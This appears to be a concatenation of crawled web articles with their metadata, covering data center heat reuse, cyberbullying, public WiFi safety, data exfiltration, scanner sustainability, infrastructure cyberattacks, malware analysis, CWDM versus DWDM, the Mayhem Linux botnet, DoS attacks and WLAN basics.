Meanwhile, with gigabytes in our pockets and the cloud accessible, we won't miss our floppy disks… much. | <urn:uuid:4dc6fa00-ac9b-40b5-89da-ddae9d3f8624> | CC-MAIN-2022-40 | https://www.cbtnuggets.com/blog/technology/data/4-ways-storage-technologies-have-evolved | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334987.39/warc/CC-MAIN-20220927033539-20220927063539-00165.warc.gz | en | 0.940606 | 1,144 | 2.6875 | 3 |
For every knock at data center energy waste, there’s two examples of innovative thinking and recycling going on. One of the latest design trends is using waste heat from a data center hot aisle in a district heating system for nearby offices and condos. Canada’s Telus Corp. provides the latest example of this, tapping waste heat from its data center in Vancouver to power heating and cooling systems of its adjacent $750 million mixed-use Telus Garden development.
FortisBC will operate a regulated utility within Telus Garden, in partnership with Telus and Westbank, creating a District Energy System (DES).
"The TELUS Garden District Energy System represents a shift in how we think about and utilize energy," said Andrea Goertz, senior vice-present of TELUS Strategic Initiatives and Communications. "By recovering energy that would normally be lost and putting it to good use, we are innovating through design to create one of the most environmentally-friendly urban communities in North America."
Provides 80 Percent of Energy for Tower
Waste heat from the data center and the cooling system of Telus’ Robson Street headquarters will provide 80 percent of the energy needed to heat and cool the development’s one million square feet of space, and heat domestic hot water for both of its towers on top of that. Capturing and recycling the waste heat will help reduce carbon dioxide emissions by one million kilograms a year.
"Our collaboration with Westbank and TELUS is an example of the innovation and energy savings available to customers using district energy systems,” said Doug Stout, vice-president of Energy Solutions and External Relations for FortisBC, which is featured in a video presentation about the DES.
The DES will help to reduce overall energy use and protect residents and employers from rising energy costs in the future. The British Columbia Utilities Commission has approved the construction of the TELUS DES system by the partnership, and for FortisBC to own and operate the energy system once commissioned.
This is one of the first systems in Vancouver to use waste heat from a neighboring site to heat and cool a new development. But it isn’t the first worldwide.
- Across the pond in London, Telehouse began using excess heat in a Docklands data center to heat nearby homes and businesses in 2009. It was the most ambitious effort at the time to reuse the excess heat from data centers.
- IBM has a data center in Switzerland that warms a nearby community swimming pool.
- An unusual concept was put forth by researchers from Microsoft and the University of Virginia in a paper published in 2011. It suggested that large cloud infrastructures could be distributed across offices and homes, which would use exhaust heat from cabinets of servers to supplement (or even replace) their on-site heating systems.
Interested in getting in on this heat recycling love fest? Check out DCK’s Guide to HeatRrecycling. | <urn:uuid:a08be8ee-2828-4e7b-a461-ccf7d3493675> | CC-MAIN-2022-40 | https://www.datacenterknowledge.com/archives/2013/03/04/telus-warm-condos-with-heat-from-servers/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335254.72/warc/CC-MAIN-20220928113848-20220928143848-00165.warc.gz | en | 0.931863 | 604 | 2.65625 | 3 |
A quick peek at young students’ Facebook profiles and a common trend appears: mean statuses written about fellow classmates, with endless comments from other students who are in agreement.
Cyber bullying has been on the rise since the emergence of online networking sites. It can lead to depression, and often suicide.
The question that always comes up is where were the parents? Parents are now faced with the task of teaching their kids how to behave online.
Common Sense Media is a nonprofit organization that has created a website that allows parents to do just that. It is a tool that helps teach parents, teachers, and students the dangers of online bullying. It teaches students how to avoid it, and how to make a stand when they see others doing it. The website tries to address students based on their age level, so there is a separate toolkit for elementary school, middle school, and high school.
It’s not always possible for teachers to monitor students, so it is important that teachers and parents are both involved in the learning process. Unless they are Facebook friends with their kids and students, they often have no way of knowing that online bullying is going on. At least now they can prevent the problem before it happens. | <urn:uuid:69b66e74-c3dd-4353-bdf3-2c2bea0aec94> | CC-MAIN-2022-40 | https://www.faronics.com/news/blog/taking-a-stand-against-cyber-bullying | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335254.72/warc/CC-MAIN-20220928113848-20220928143848-00165.warc.gz | en | 0.980938 | 249 | 3.484375 | 3 |
Public WiFi is available in more places than ever before. You can log on while at the local coffee shop, doctor’s office, on the train, and at the airport. Local governments and cable companies are even starting to offer free WiFi in some locations.
The convenience is undeniable, especially for the ability to work remotely, but this freedom to connect can also present a security risk if you don’t know who else is connecting to the same public WiFi network. By surfing the web for free without adequate protections, you could be allowing hackers on the same network to intercept your data — essentially “hijacking” it — or put your device itself at risk.
These risks don’t mean that you should stop using public WiFi entirely. There are immense benefits to being able to connect to work or home on the go. Before you plug in the free password at your favorite coffee shop, it’s worth taking a few simple steps to protect yourself from these types of attacks and ensure your personal or corporate data is kept secure.
Verify your network
Start by verifying the network itself. It’s easy for an attacker to create a bogus WiFi network, perhaps with a name that sounds like the one you may be looking for, to ensnare victims. A straightforward way to verify this is with an employee of the establishment — check you’re connecting to the right network before you plug in the password or even compare its IP address.
It’s also always better to stick with the most reputable option — maybe the Starbucks WiFi instead of a random public network that may happen to be available, but that you aren’t sure of the source. Also, before you hit “Agree,” it’s worth reading through the Terms and Conditions to understand how the vendor is using your browsing data.
Utilize security tools
For an added level of protection, many users opt to use a virtual private network (VPN) when connecting to free public WiFi. A VPN works by extending a private network across a public network, essentially replicating a direct connection to the private network. It can also, in some cases, layer on additional security protections like encryption. What does this all mean? Essentially, while you’re connecting to a public WiFi network, you’re protected like it’s a private one.
There are many choices for VPNs out there. It’s worth taking the time to find a reputable choice, as some are more secure than others. Check out an independent review site or ask a security professional which one they would recommend before purchasing.
Stay aware of your surroundings
When surfing the internet, try to browse with “HTTPS” sites, which means they are encrypted and therefore better secured against attack (instead of “HTTP” sites, which are unprotected). Try also to avoid or turn off file sharing — such as AirDrop or other similar file and print sharing services — which allow other nearby users or users on the same network to easily share potentially malicious files.
Even with all these protections in place, it’s always best practice to assume that attackers are watching. Consider waiting until you get home before logging into your bank or sensitive corporate accounts or even entering information like your email, credit card account or social security number.
These steps are by no means comprehensive, but they can help make an inherently insecure connection, like public WiFi, a bit more secure.
That way, you can enjoy the benefits of connection on the go, without the worry of compromising your personal or corporate data. | <urn:uuid:1bcae59d-9e29-4272-8a21-c59680f21cda> | CC-MAIN-2022-40 | https://dartmsp.com/using-public-wifi-heres-how-to-protect-yourself/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335365.63/warc/CC-MAIN-20220929194230-20220929224230-00165.warc.gz | en | 0.946359 | 736 | 2.734375 | 3 |
Data exfiltration is the unauthorized transfer of data from a computer or other device. It can be conducted manually via physical access to a computer or as an automated process using malicious programming on the internet or a network.
Data exfiltration is also known as: data extrusion, data exportation, data leaks, data leakage, data loss, and data theft.
While data exfiltration attacks can be carried out by malicious actors, it can also happen due to unintentional human error. There are three common ways data exfiltration can occur:
- External attack: The most common source of data loss is email, and phishing is the most common technique used. These attacks are typically targeted, with the objective of gaining access to a network or machine to locate and copy specific data.
- Accidental loss: Employees and business partners may accidentally be responsible for data exfiltration due to negligence or oversight. For example, an employee may send out sensitive company data to an incorrect email address or copy a confidential document to a personal device, which is against company security policies.
- Disgruntled insider: In some rare cases, company insiders may intentionally copy or email sensitive data to cause harm. This can be done by an unhappy or former employee who still has access to company systems.
According to an annual IBM report, the average total cost of a data breach was $3.92 million in 2019. For some industries, such as healthcare, this number can almost double. Data breaches in the United States were the most expensive, with an average cost of $8.19 million. The average size of the data breach was 25,575 records.
Data loss can lead to financial losses and have a long-lasting impact on an organization’s reputation.
There are a number of strategies that organizations can put in place to prevent data exfiltration:
- Deploy data loss prevention (DLP). DLP is a set of technology and business policies to make sure end users do not send sensitive or confidential data outside the organization. A DLP system scans all outbound email to look for pre-determined patterns that might indicate sensitive data, including credit card numbers, Social Security numbers, and HIPPA medical terms. Messages containing this type of sensitive data are automatically encrypted or blocked from being sent out, depending on the policy.
- Set up encryption policies. Establish policies to encrypt sensitive data while it’s in transit. Encrypted messages cannot be intercepted or tampered with by hackers.
- Prevent phishing attacks. Phishing attacks are commonly used by malicious actors in data exfiltration attacks. Investing in good anti-phishing technologies that will detect and block phishing attacks is a must to prevent data loss.
- Revoke data access for former employees and contractors. Organizations must stay on top of who has access to their sensitive data and revoke access to employees or partners as soon as a business relationship is over. Leaving access open for even an extra day may cause a serious security breach.
- Educate your employees. Invest in educating your users on how to recognize phishing attacks that may lead to data exfiltration and how to follow internal policies on data security. The number one cause of data loss is human error, so make sure your employees understand how to keep company data secure.
- Back up your data. Unfortunately, some organizations may face a security breach that will lead to data loss. It’s important for organizations to be prepared and back up all of their data so they can quickly restore any lost data without a negative impact on their business operations and productivity.
How Barracuda Can Help
Barracuda Email Protection scans your email traffic to block malicious attachments and URLs, including those in phishing and spear-phishing emails. It also uses advanced analysis to spot typo-squatting, domain impersonation, and other signs of phishing.
Barracuda data loss protection and email encryption keep sensitive data—such as credit card numbers, Social Security numbers, HIPAA data, and more—from leaving your organization. Content policies can automatically encrypt, quarantine, or even block certain outbound emails based on their content, sender, or recipient.
Barracuda Email Protection also includes Impersonation Protection which uses powerful artificial intelligence engine that learns organizations’ unique communications patterns to identify and block real-time spear-phishing attempts. By finding anomalous signals in incoming messages, Impersonation Protection can prevent phishing and social-engineering attacks before they strike.
It’s important to train users to spot potential phishing emails and delete them. Users should err on the side of caution and confirm the authenticity of any unexpected email by contacting the apparent sender. Barracuda Security Awareness Training uses advanced training and simulation to measure your vulnerability to phishing emails and teach users how to avoid becoming victims of data theft, malware, and ransomware.
Barracuda Backup operates as the first line of defense against data loss during catastrophic system failure. By seamlessly integrating all your data—whether physical, virtual, or in the cloud—Barracuda Backup is the optimal solution for data protection in the modern age.
Have questions or want more information about Data Exfiltration? Get in touch right now! | <urn:uuid:49854ebf-510a-4294-94da-11d6581d98ae> | CC-MAIN-2022-40 | https://www.barracuda.com/glossary/data-exfiltration | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335365.63/warc/CC-MAIN-20220929194230-20220929224230-00165.warc.gz | en | 0.924424 | 1,079 | 3.65625 | 4 |
Reduce waste and resource consumption by digitizing paper records and workflows.
Environmental sustainability has become an important focus of business planning and operations worldwide.
According to results from a 2020 survey by KPMG, 96% of the largest 250 companies in the world⧉ (the G250) now report on their sustainability performance using a variety of metrics. The movement toward more socially and ecologically mindful business has even spawned a set of corporate investment guidelines known as Environmental, Social, and Governance (ESG) criteria.
Companies are becoming more transparent with regard to sustainable and socially responsible practices, and guidelines like ESG make it easier for stakeholders and investors to evaluate a company’s impact on the world. ESG and other sustainability programs promote opportunities to make specific technology decisions that can go a long way toward meeting corporate sustainability goals.
Document scanners play an important role in these efforts.
For example, by incorporating document scanners into business workflows, companies can significantly reduce paper usage and waste. When hard copy documents are scanned, the new digital format can be easily distributed to others; it’s no longer necessary to make paper copies to guarantee access to information already in print.
In addition, reducing the need to print and copy paper documents saves a significant amount of energy, and using less ink and toner provides a huge benefit in terms of financial and environmental costs. It’s also important that business leaders choose sustainably manufactured scanners and follow responsible end-of-life recycling practices for their hardware.
Paper takes a major toll on the environment—not just in the amount of lumber cut down every year, but also in the staggering amount of energy it takes to process wood for retail and later break it down after it has been discarded. In 2018, the Environmental Protection Agency (EPA) found that the largest component of municipal solid waste was paper and cardboard, approximately a fourth of the total material reported⧉.
The EPA also notes that approximately 375 million toner and ink cartridges⧉ are discarded and sent to landfills each year. This is especially harmful to the environment because cartridges are made of hard plastics and fortified with heavy metals. Also, ink and toner contain chemicals that are known to be hazardous when they seep into soil. Any effort to reduce the usage of these materials provides a measurable environmental benefit.
Going paperless also saves companies a lot of money, and it helps keep business operations secure, efficient, and organized.
Making the shift to paperless workflows significantly reduces electricity usage and costs over time. It doesn’t take nearly as much energy to keep a computer running as it does to output documents from a printer.
According to the Energy Use Calculator⧉, a typical inkjet printer requires about 30 to 50 watts of power during printing, and 3 to 5 watts in standby mode. However, businesses typically use heavy-duty printers and large multi function devices, which use about 300 to 500 watts of power while printing, and 30 to 50 watts in standby mode.
Even when an office printer isn’t in use, it still draws energy. And because businesses typically create several copies of certain documents, a large amount of electricity is spent for the same document. This inefficiency can be eliminated by going paperless and using scanners to digitize important corporate documents.
It’s important to choose document scanners and other products from companies that value corporate responsibility and that make environmentally conscious decisions. In 2019, Kodak Alaris completed a progress review of a 5-Year Environmental Plan⧉ that started in 2015. Our achievements include high levels of EPEAT® certification across our product line.
For all of our document scanners and services, we use sustainable and/or recycled materials, and our products are Electronic Product Environmental Assessment Tool (EPEAT®) certified and Energy Star®-certified. By choosing Kodak Alaris for your document scanning, you’ll always know you’re making an environmentally responsible decision.
EPEAT⧉ is a worldwide rating system managed by the Green Electronics Council⧉ that acknowledges the environmental performance and full lifecycle of electronic products, from the time of their design and production to their energy use and recycling.
The EPEAT criteria ranks in terms of Bronze, Silver, and Gold. Kodak Alaris has a total of 33 EPEAT-registered scanners, with 100% meeting the Silver criteria as of 2019 and 12 scanners meeting the Gold standard as of 2021. This is more than any other manufacturer in the industry.
Making sustainable decisions doesn’t stop when your equipment is out of date or non-functional. Implementing responsible end-of-life (EOL) practices for hardware is critical to maintaining a healthy environment. Kodak Alaris designs sustainable products to help our customers pursue greener ways of doing business and inspire other companies in the industry to do the same.
Eco-friendly waste management for equipment, batteries, and packaging is a high priority. Kodak Alaris is compliant with laws in both Waste Electrical and Electronic Equipment (WEEE)⧉ and Restriction of the use of certain Hazardous Substances (RoHS)⧉, which originated in the European Union and are legislatively linked.
Whether you represent a government organization or a business, or if you’re looking for high-performance scanners for your own use, you can be assured that Kodak Alaris prioritizes environmentally responsible product management to help every individual and organization reach their sustainability goals.
For more information on making sustainable business decisions and how Kodak Alaris can help, contact us using the following information or by completing the form below.
Service and support: 1-800-525-6325
Sales inquiries: 1-800-944-6171 | <urn:uuid:e4e4c6db-2450-4acc-9a13-7a0dd8418f5c> | CC-MAIN-2022-40 | https://www.alarisworld.com/en-gb/insights/articles/how-document-scanners-help-businesses-meet-sustainability-goals | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335530.56/warc/CC-MAIN-20221001035148-20221001065148-00165.warc.gz | en | 0.934636 | 1,203 | 2.78125 | 3 |
The global growth of smart technology is booming across homes, industries, cities, and infrastructure. Its advantages are exponential and its uses vast; technologies range from home sensors and mainstream wearables, right through to connected vehicles and smart architecture.
Its ability to use big data, automate energy use, and create cost efficiencies means smart technology is becoming increasingly prevalent in national infrastructures. Operators are turning to smart tech as a solution to automating processes and unlocking the potential of data, helping them to build smart buildings, cities, and grids. The smart grid market alone is expected to reach a value of over $92.1 billion by 2026, representing a CAGR of 17.76% since 2019.
However, with power comes great responsibility and these initiatives can only truly succeed when they are underpinned by effective cybersecurity measures.
The attack on critical infrastructure
Governments around the world are on a mission to make national infrastructure faster, smarter, and greener. Unfortunately, this is something cybercriminals have quickly used to their advantage and attacks on critical infrastructure are on the rise.
However, it is important to recognize that these attacks aren’t always driven by opportunistic cybercriminals. More frequently, attacks turn out to be highly strategic, state-sponsored assaults, which aim to cause immense societal, economic, and environmental damage.
In fact, strikes on critical infrastructure can be considered as modern-day warfare. Rather than sending in troops on the ground, attackers are gathering digital soldiers to hit their enemies where it hurts. As well as impacting civilians and damaging society, these assaults proactively seek to cause extreme environmental damage.
As well as the immense threat to society, this level of cyber warfare significantly impedes sustainability initiatives and could result in grave consequences for the environment.
Therefore, it is even more critical that infrastructure organizations mitigate these risks by placing cybersecurity at the heart of their digital transformation and sustainability strategies.
Even when an attack isn’t intended to cause environmental damage, there is often still significant impact on both society and the environment. This was demonstrated when a cybercriminal gang took down the Colonial Pipeline, the US’s largest fuel pipeline.
The pipeline itself moves 2.7 million barrels of refined petroleum products a day from the Gulf Coast to the East Coast, providing states along the eastern seaboard with about half of their total fuel requirements. However, the operator had to quickly take itself offline when it realized it had fallen victim to a malicious malware attack originating in Russia, causing substantial societal disruption and environmental damage.
While the hackers claimed that the attack wasn’t intended to harm society (or the environment), the consequences were still severe. Shortages in fuel supply on the East Coast drove up prices by six cents per gallon, a level not seen since 2014. Due to the disruption to supply, the US government had to relax road restrictions to enable delivery transporters to ship fuel over land more freely. Meanwhile, traffic congestion along the East Coast skyrocketed as citizens attempted to obtain fuel before it dried up. Combined with the energy consumption required to fight an attack itself, and the subsequent power needed to recover and stabilize systems, the total environmental impact will be vast.
It appears hackers gained access to the Colonial Pipeline via remote desktop software, which engineers were accessing to control systems for the pipeline from home. To add insult to injury, the operator paid the hackers $5 million in a bid to reinstate services. A costly catastrophe on all accounts.
A cyber-embedded approach
This case alone reinforces the critical need for a fully embedded cybersecurity strategy. As cities around the world becomingly increasingly reliant on connected, sustainable infrastructure, it is simply not feasible (or responsible) to take a disjointed approach and hope for the best. Operators must adopt end-to-end solutions with a trusted partner, such as Capgemini.
Sadly, the Colonial Pipeline example isn’t unique; 99% of cyberattacks take place through the back door. That’s why it’s crucial to ensure cybersecurity is watertight across the board and to work with a partner that can advise on best practice throughout the full life cycle of cybersecurity. Only by taking this approach can national infrastructure become truly sustainable – in every sense of the word. | <urn:uuid:2270b069-e0eb-4b81-8764-1fc4b75cc8df> | CC-MAIN-2022-40 | https://www.capgemini.com/au-en/2021/07/cybersecurity-the-linchpin-of-sustainable-infrastructure/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337432.78/warc/CC-MAIN-20221003200326-20221003230326-00165.warc.gz | en | 0.948318 | 877 | 3.1875 | 3 |
These days several enterprises encounter suspicious links and websites that are ready to steal their data. This isn't very surprising as cyber crimes have increased tremendously in the last few years. Last year, Zscaler’s platform detected and blocked 2.7 million encrypted phishing attacks per month. It also found that 32 percent of newly-registered, potentially malicious domains were using SSL certificates. These fraudulent activities can not be completely stopped, but, companies can easily counter the malware malpractice by doing malware analysis.
But, before we get on to malware analysis and different tools for malware analysis, let's learn what malware is? Malware can be defined as a program or file that is harmful to a computer, which means these files or programs have the potential to steal, delete or alter sensitive data stored in the system. This malicious software can also keep an eye on the user's activity within the system.
Different forms of malware can be harmful to the user in various ways, as in some cases malware causes little damage, while in other cases it turns out to be disastrous. These can be spread through any means, either physically or virtually. The most common way of allowing malware to enter is through USB transfers or clicking on phishing emails.
One of the most effective ways to counter malware attacks is through malware analysis. Do you know how malware analysis works? There is a certain malware analysis software that helps users to detect any malware or suspicious malware attacks.
Malware analysis can be defined as the process in which suspicious files and URLs are scanned properly to understand their behavior and purpose. In case any outcome is against the user, then the user can easily avoid or stay alert of the malware attack.
Malware analysis is done in various ways i.e. static, dynamic, or hybrid, depending upon the choice and situation.
1. Static Malware Analysis
In static malware analysis, there is no need to run the code, as files are examined thoroughly to identify any signs of malicious content. This type of analysis has been useful in determining malicious infrastructure, libraries, or packed files.
The best malware analysis tools for static analysis can be disassemblers or network analyzers, as these tools can scan the malware without running the code. But, one demerit of using this analysis is that it fails to detect some sophisticated malware that has malicious runtime behavior.
2. Dynamic Malware Analysis
This type of analysis is now used by enterprises to study malicious files more thoroughly. It is conducted in a safe environment called a sandbox, where suspected malicious codes are operated. In this closed system, the analyzers can closely inspect the malware, without letting the malware corrupt the system. Certain dynamic malware analysis tools are best at uncovering the truth of malware files by giving analyzers deeper visibility. But, sometimes dynamic malware analysis fails if the adversaries have hidden the code and let the code remain hidden until favorable conditions arise.
3. Hybrid Malware Analysis
Both static and dynamic malware analysis have their drawbacks. But, better scanning results can be obtained if both methods are combined. With hybrid malware analysis, even the hidden codes can be detected. Hybrid analysis has been very useful in scanning and detecting even the most sophisticated malware.
Malware analysis isn't a single-step process, as it includes several stages to complete the analysis of a suspected file. Let’s take a look at the stages step-by-step.
1. Static Properties Analysis
Static properties of malware are the strings that are embedded in a malware code, header details, metadata, embedded resources, and other elements. This detection is very essential to create Indicators Of Compromise(IOCs). Getting these elements detected can be done very quickly as there is no need to run the codes.
Another reason why static properties analysis is the first step is that its results indicate whether a further investigation is required or not.
2. Interactive Behavior Analysis
In behavior analysis, the sample of malware is taken for observation and interaction by running the code. While running the code, the analyst deeply studies different things like sample registry, file system and process, and network activities. In case any malware is suspected to be harmful, then the analysts simulate the sample to test their theory. This is the reason why professional analysts are needed for behavior analysis.
3. Fully Automated Analysis
This stage is one of the quickest and easiest ways to access any suspected file, link or website. In this analysis, it can be quickly determined if the malware can infiltrate the network or not. Also, it produces easy-to-read reports for the security team to take further steps as quickly as possible. This step requires fully automated tools to determine the suspicious nature of malware.
4. Manual Code Reversing
Code reversing is a special skill among analysts but it is quite tedious.
This is the final stage of malware analysis in which the analysts reverse engineer the code with the use of debuggers, disassemblers, compilers and more. They then use this code to determine the logic of the malware algorithm. This helps them understand the hidden abilities of the malware.
Malware attack is a common thing that cybercriminals do, but with the advancement of technology, a suspicious attack can be easily detected and countered in advance. So, it is always advisable to click on any suspicious link only after determining its authenticity.
REVERSS is a dynamic malware analysis tool provided by Anlyz. This advanced malware analysis tool uses reverse engineering techniques to provide real-time analytics and protect your system against cyber threats. Get in touch with us to know more about the features of REVERSS. | <urn:uuid:0f1e6b32-17f6-4164-8a87-69ac6f61ec2f> | CC-MAIN-2022-40 | https://anlyz.co/countering-enterprise-malware-blindness/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337537.25/warc/CC-MAIN-20221005042446-20221005072446-00165.warc.gz | en | 0.920089 | 1,142 | 2.59375 | 3 |
CWDM vs DWDM: What’s the Difference?
When dealing with OTN (Optical Transport Network), there are two main types of Wavelength Division Multiplexing (WDM) systems: Coarse Wavelength Division Multiplexing (CWDM) and Dense Wavelength Division Multiplexing (DWDM). As two modern WDM technologies, they are both used for increasing the bandwidth of fiber by combining optical signals of different wavelengths on one strand of fiber. But CWDM vs DWDM, what are their differences?
WDM, CWDM and DWDM Wiki
To better understand the difference between CWDM and DWDM, we’d better get to know what’s WDM, CWDM, and DWDM in the first place.
WDM is a technology for transporting large amounts of data between sites. It increases bandwidth by allowing different data streams to be sent simultaneously over a single optical fiber network. In this way, WDM maximizes the utilization of fiber and helps to optimize network investments.
What’s CWDM and DWDM?
As mentioned above, CWDM and DWDM are two technologies developed based on WDM, but with different wavelength patterns and applications. CWDM is a flexible technology that can be deployed on most types of fiber networks. It is typically deployed in point-to-point topology in enterprise networks and telecom access networks. While DWDM is viewed as an option for the metropolitan network. Now it is also used for interconnecting data centers and for financial services networks and is often deployed in a ring topology.
CWDM vs DWDM, What Are Their Differences?
CWDM and DWDM are both effective methods to solve the increasing bandwidth capacity of information transmission at present. But they differ from each other in many aspects. Below parts will introduce some differences between CWDM and DWDM systems.
CWDM vs DWDM: Channel Spacing
The channel spacing is defined to be the nominal difference in frequency or wavelength between two adjacent optical channels. CWDM has a wider spacing than DWDM. It is able to transport up to 18 CWDM wavelengths with a channel spacing of 20nm in the spectrum grid from 1271nm to 1611nm. DWDM can carry 40, 80, or up to 160 wavelengths with a narrower spacing of 0.8/0.4nm (100 GHz/50 GHz grid). Its wavelengths are from 1525nm to 1565nm (C band) and 1570nm to 1610nm (L band).
CWDM vs DWDM: Transmission Distance
Since DWDM wavelengths are highly integrated with the fiber during light transmission, DWDM is able to reach a longer distance than CWDM. Unlike the DWDM system, CWDM is unable to travel unlimited distances. The maximum reach of CWDM is about 160 km. While an amplified DWDM system can go much further.
CWDM vs DWDM: Modulation Laser
CWDM system uses the uncooled laser while the DWDM system uses the cooling laser. Cooling laser adopts temperature tuning which ensures better performance, higher safety, and longer lifespan of the DWDM system. But it also consumes more power than the electronic tuning uncooled laser used by a CWDM system.
CWDM vs DWDM: Cost
Because the range of temperature distribution is nonuniform in a very wide wavelength, so the temperature tuning is very difficult to realize, thus using the cooling laser technique increases the cost of the DWDM system. Furthermore, the DWDM devices are typically four or five times more expensive than that of a CWDM system. However, the price of a DWDM transceiver is about 20-25% less than a CWDM transceiver on account of the popularization of DWDM.
CWDM vs DWDM: Advantages and Disadvantages
As mentioned above, the primary difference between DWDM and CWDM is the channel spacing (CWDM has almost 100 times wider channel spacing). This makes CWDM a simpler technology, resulting in advantages and disadvantages of the different systems with regard to cost, performance, and so on.
CWDM Advantages and Disadvantages
|CWDM Advantages||CWDM Disadvantages|
DWDM Advantages and Disadvantages
|DWDM Advantages||DWDM Disadvantages|
CWDM vs DWDM, Which Do You Prefer?
The tremendous demand for more bandwidth has triggered the DWDM's development, which makes it more favored in the market. And it has experienced great advancement in cost reduction. However, CWDM still has the price advantage for connection rates below 10G and for short distances. With low data rates, it is currently more feasible. In this way, CWDM and DWDM each will provide a unique “fit” in the OTN network, and will complement rather than replace each other in the future. | <urn:uuid:ced2ab01-c0ac-4086-9b7f-46198df4b5f8> | CC-MAIN-2022-40 | https://community.fs.com/blog/what-is-the-difference-between-dwdm-and-cwdm-optical-technologies.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337836.93/warc/CC-MAIN-20221006124156-20221006154156-00165.warc.gz | en | 0.945634 | 1,096 | 3.390625 | 3 |
Security experts at Russian Internet company Yandex have detected a new strain of malware dubbed Mayhem which is targeting server based on Linux and FreeBSD OSs.
The malware Mayhem was designed to infect servers running the popular distributions and use them as part of a botnet, even without the need of any root privileges.
Mayhem isn’t a totally new malware, it was first discovered in April 2014, and according to the experts at Yandex, it is linked to the “Fort Disco” brute-force campaign uncovered by Arbor Networks in 2013 that compromised more than 6000 websites based on popular CMSs.
Mayhem is considered a dangerous cyber threat, it has a modular structure which is able to load numerous payload to compromise targeted systems.
The attackers use a sophisticated PHP script to compromise the servers, it still has a low detection rate with the principal antivirus products on the market. Mayhem scans the internet searching for vulnerable servers, the rfiscan.so for example is used to discover servers hosting websites with a remote file inclusion (RFI) vulnerability, once the malware exploits an RFI it will run a PHP script on a victim.
The experts have discovered that more than 1,400 Linux and FreeBSD servers have been compromised worldwide, but it could be just the tip of the iceberg considering that Mayhem infects mainly those machines which are not updated with security. The majority of infected servers is located in the USA, Russia, Germany and Canada.
“In the *nix world, autoupdate technologies aren’t widely used, especially in comparison with desktops and smartphones. The vast majority of web masters and system administrators have to update their software manually and test that their infrastructure works correctly,”
“For ordinary websites, serious maintenance is quite expensive and often webmasters don’t have an opportunity to do it. This means it is easy for hackers to find vulnerable web servers and to use such servers in their botnets.” said the researchers in a technical report published by Virus Bulletin.
“As stated previously, the malware uses a hidden file system to store its files. The file system comprises a file that is created during the initialization. The filename of the hidden file system is defined in the configuration, but its name is usually ‘.sd0’. To work with this file system an open-source library ‘FAT 16/32 File System Library’, is used. The library contains code to create and work with the FAT file system, but it is not used in the original form – some functions have been modified to support encryption. Every block is encrypted with 32 rounds of XTEA algorithm in ECB mode and the encryption key differs from block to block.
The hidden file system is used to store plug-ins and files with strings to process: lists of URLs, usernames, passwords, etc.” states and interesting report published by malwaremustdie.org.
The modular structure of Mayhem is alarming security experts which believe that bad actors behind the malicious campaign are developing new plugins to improve the botnet, according the researchers they have also found an exploit for the Heartbleed vulnerability.
Security Affairs – (Mayhem, Linux) | <urn:uuid:ef73154a-23f0-454f-af9d-2f27e2f05a5e> | CC-MAIN-2022-40 | https://securityaffairs.co/wordpress/26970/malware/mayhem-malware-linux-freebsd.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030338280.51/warc/CC-MAIN-20221007210452-20221008000452-00165.warc.gz | en | 0.943023 | 661 | 2.515625 | 3 |
You may have heard news reports about popular websites such as CNN, Amazon and Yahoo! being taken down by a DoS attack, but have you ever wondered what DoS means?
This common tech term stands for “denial-of-service,” where an attacker attempts to prevent legitimate users from accessing a website entirely or slowing it down to the point of being unusable. The most common and obvious type of DoS attack occurs when an attacker “floods” a network with useless information.
When you type a URL for a particular website into your browser, you are sending a request to that site’s computer server to view the page. The server can only process a certain number of requests at once, so if an attacker overloads the server with requests, it can’t process your request. The flood of incoming messages to the target system essentially forces it to shut down, thereby denying access to legitimate users.
A distributed denial-of-service (DDos) attack is one where a site is attacked, but not by just one person or machine. DDos are attacks on a site by two or more persons or machines. These attacks are usually done by cybercriminals using botnets (remote computers that are under their control), to bombard the site with requests. Cybercriminals create botnets by infecting a collection of computers—sometimes hundreds or thousands—with malware that gives them control of the machines, allowing them to stage their attack.
There is also an unintentional DoS where a website ends up denied, not due to a deliberate attack by a single individual or group of individuals, but simply due to a sudden enormous spike in popularity. This can happen when an extremely popular website posts a prominent link to a second, less well-prepared site, for example, as part of a news story. The result is that a significant proportion of the primary site’s regular users–potentially hundreds of thousands of people—click that link in the space of a few hours, having the same effect on the target website as a DDoS attack. When Michael Jackson died in 2009, websites such as Google and Twitter slowed down or even crashed.1
While this can be an inconvenience to you, as you may not be able to complete transactions or access your banking site, there’s no real danger for you. But unbeknownst to you, your computer or mobile device could be part of the botnet that is causing a DDos attack.
To make sure you’re not part of a DDos attack:
- Pay attention if you notice that your Internet connection is unusually slow or you can’t access certain sites (and that your Internet connection is not down)
- Make sure you have comprehensive security installed on all your devices, like McAfee LiveSafe™ service
- Be careful when giving out your email address, clicking on links and opening attachments, especially if they are from people you don’t know
- Stay educated on the latest tactics that hackers and scammers use so that you’re aware of tricks they use
1 “Web slows after Jackson’s death”. BBC News
Follow us to stay updated on all things McAfee and on top of the latest consumer and mobile security threats. | <urn:uuid:901d6697-2a0c-4a34-bdf7-a08adca61377> | CC-MAIN-2022-40 | https://www.mcafee.com/blogs/consumer/denial-service-attack | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030338280.51/warc/CC-MAIN-20221007210452-20221008000452-00165.warc.gz | en | 0.93371 | 678 | 3.53125 | 4 |
Wireless Local-Area Networks, known as Wireless LAN or simply WLAN technology, provide network connections over microwave links typically around 2.4 and 5 GHz. Most of what is called WLAN today is based on the IEEE 802.11 family of standards and marketed as Wi-Fi.
Another general family of wireless network technology is based on digital mobile telephony, carrying IP networking over the worldwide mobile telephony internetwork. Look here for an example of mobile IP networking in Bulgaria, where in 2011 they had the third-fastest Internet service in the world.
The U.S. Federal Communications Commission released the 2.5 GHz ISM band for unlicensed use in 1985. (that is, the Industrial, Scientific, and Medical radio bands used by microwave ovens, medical diathermy, and industrial RF heating)
